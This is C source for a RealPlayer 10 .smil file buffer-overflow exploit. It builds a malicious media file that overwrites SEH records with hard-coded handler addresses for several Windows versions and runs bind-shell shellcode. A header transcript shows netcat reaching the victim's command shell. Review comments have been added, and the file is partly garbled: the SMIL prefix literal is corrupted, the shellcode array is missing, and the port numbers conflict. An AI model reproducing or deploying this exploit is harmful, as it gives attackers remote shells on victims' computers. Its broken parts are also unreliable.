/* RealPlayer .smil file buffer overflow
Coded by nolimit@CiSO & Buzzdee
greets to COREiSO & #news & flare & class101 & ESI & RVL & everyone else I forget
This uses an SEH-overwrite method: the exception-registration record lands at a
different offset in the overflowed buffer on each OS, so the payload writes a short
jump plus a handler address (pop/pop/ret, or call ebx for 2k) at every offset we
have seen (XP, 2k3, 2k) and one file covers all of them. "Universal" only holds for
the OS/DLL builds whose addresses are hard-coded in main(); any other build needs
its own offset and handler address.
Also, we added SEH slots for 2k3 Enterprise and Standard; if you have a different
2k3 build, find its offset and handler address yourself and add them in main().
C:\tools>nc -vv SERVER 1554   (NB: this transcript uses port 1554 while main() reports 13579;
                               the port is chosen by the shellcode, which is not shown in this
                               listing -- verify before relying on either number)
SERVER [192.168.1.93] 1554 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Real\RealPlayer>
*/
/* Header names were stripped from this listing and are restored from the calls
 * main() makes: stdio.h (printf/fopen/fprintf/fclose/perror), string.h
 * (memset/memcpy), stdlib.h (exit status constants). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* SMIL document prefix emitted before the payload.
 * NOTE(review): the markup inside this literal was lost when the listing was
 * extracted (tags stripped, a line of mis-encoded text mixed in) and the
 * literal is no longer valid C; it must be reconstructed from a working copy.
 * Whatever it ends up as, it has to end inside an open attribute value
 * (i.e. with `="`), because main() writes the overflow buffer as that value
 * and then closes it with `"/>` (see the fprintf there). */
char pre[]=
"\n"
" \n"
" \n"
" \n"
" \n"
"
\n"
"
\n"
" |
| |
|
| | | |
|
|
|
|
|
|
| |
ÑÇÖÞÅ·ÃÀÔÚÏß
"
"";
/* Payload buffer, filled by main(): a 0x90 NOP sled with the four SEH slots
 * (jump + handler pairs at 1068..1115) and the shellcode at offset 1125.
 * Written into the .smil file as an attribute value via "%s", so it relies
 * on a NUL terminator inside the buffer (the shellcode's own, presumably). */
char overflow[1700];
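/* Layout of the overflow[] payload.  Each SEH slot is a 4-byte short jump
 * ("\xeb\x08\xeb\x08": jmp +8, executed from the overwritten "next" pointer)
 * followed by the 4-byte handler address; the jump lands in the NOP sled
 * that runs on to the shellcode at SHELLCODE_OFF. */
enum {
    SEH_XP_OFF      = 1068, /* handler at 1072: Windows XP (pop pop ret)               */
    SEH_2K3_SB_OFF  = 1084, /* handler at 1088: Windows 2003 "small biz" (pop pop ret) */
    SEH_2K3_ENT_OFF = 1100, /* handler at 1104: Windows 2003 Enterprise (pop pop ret)  */
    SEH_2K_OFF      = 1108, /* handler at 1112: Windows 2000 (call ebx in pncrt.dll)   */
    SHELLCODE_OFF   = 1125  /* shellcode after a few NOPs to land in                   */
};

/* Write one SEH slot: the short jump at off, the handler address at off+4.
 * handler must point at exactly 4 bytes. */
static void place_seh(size_t off, const char *handler)
{
    memcpy(overflow + off, "\xeb\x08\xeb\x08", 4);
    memcpy(overflow + off + 4, handler, 4);
}

/* Build the payload in the global overflow[]: a NOP sled with the four SEH
 * slots and the shellcode dropped in at their fixed offsets.
 * Returns 1 on success, 0 if the shellcode would run past the end of
 * overflow[] (the original memcpy'd it unconditionally).
 * NOTE(review): main() emits overflow with "%s", so the payload must carry a
 * NUL terminator; that holds when shellcode is a string-literal array
 * (sizeof includes its terminator), which is assumed here -- verify. */
static int build_overflow(void)
{
    size_t shell_end = SHELLCODE_OFF + sizeof(shellcode);

    if (shell_end > sizeof(overflow))
        return 0;

    memset(overflow, 0x90, sizeof(overflow)); /* NOP sled everywhere else */
    place_seh(SEH_XP_OFF,      "\x4a\xe1\xc9\x61");
    place_seh(SEH_2K3_SB_OFF,  "\xae\x7f\xA2\x60");
    place_seh(SEH_2K3_ENT_OFF, "\xae\x7f\xA2\x60");
    place_seh(SEH_2K_OFF,      "\xbf\xbb\xA2\x60");
    memcpy(overflow + SHELLCODE_OFF, shellcode, sizeof(shellcode));

    /* Safety net for the "%s" write: guarantee a terminator inside the
     * buffer whenever the shellcode does not reach its very end. */
    if (shell_end < sizeof(overflow))
        overflow[sizeof(overflow) - 1] = '\0';
    return 1;
}

/* Entry point: writes the malicious .smil file named by argv[1].
 * Exit status: EXIT_SUCCESS when the file was written, EXIT_FAILURE on
 * usage error, oversized shellcode, or any I/O failure. */
int main(int argc, char *argv[])
{
    /* argv[0] can be NULL when argc == 0; never hand that to "%s". */
    const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "smil_overflow";
    FILE *out;
    int ok;

    if (argc < 2) {
        printf("RealPlayer 10 .smil file local buffer overflow.\n");
        printf("Coded by nolimit & buzzdee.\n");
        /* The argument placeholder was missing from the original usage line. */
        printf("Usage: %s <output.smil>\n", prog);
        return EXIT_FAILURE;
    }

    if (!build_overflow()) {
        fprintf(stderr, "shellcode too large for the %lu-byte payload buffer\n",
                (unsigned long)sizeof(overflow));
        return EXIT_FAILURE;
    }

    /* "wb": the payload is raw machine code; text mode on Windows would
     * rewrite any 0x0a byte inside it as 0x0d 0x0a. */
    out = fopen(argv[1], "wb");
    if (out == NULL) {
        perror(argv[1]);
        return EXIT_FAILURE;
    }

    /* pre must end inside an open attribute value: the overflow is emitted
     * as that value and closed with "/> here.  end (defined elsewhere in the
     * file, not visible here) presumably closes the document. */
    ok = fprintf(out, "%s%s\"/>\n%s", pre, overflow, end) >= 0;
    if (fclose(out) != 0)   /* fclose flushes; a write error can surface here */
        ok = 0;
    if (!ok) {
        fprintf(stderr, "%s: write failed\n", argv[1]);
        return EXIT_FAILURE;
    }

    /* The original printed this even when fopen() failed; now only on success.
     * NOTE(review): the header transcript connects to port 1554, not 13579;
     * the port is set by the shellcode, which is not visible here -- verify. */
    printf("File written.Binds a shell on port 13579.\nOpen with realplayer to exploit.\n");
    return EXIT_SUCCESS;
}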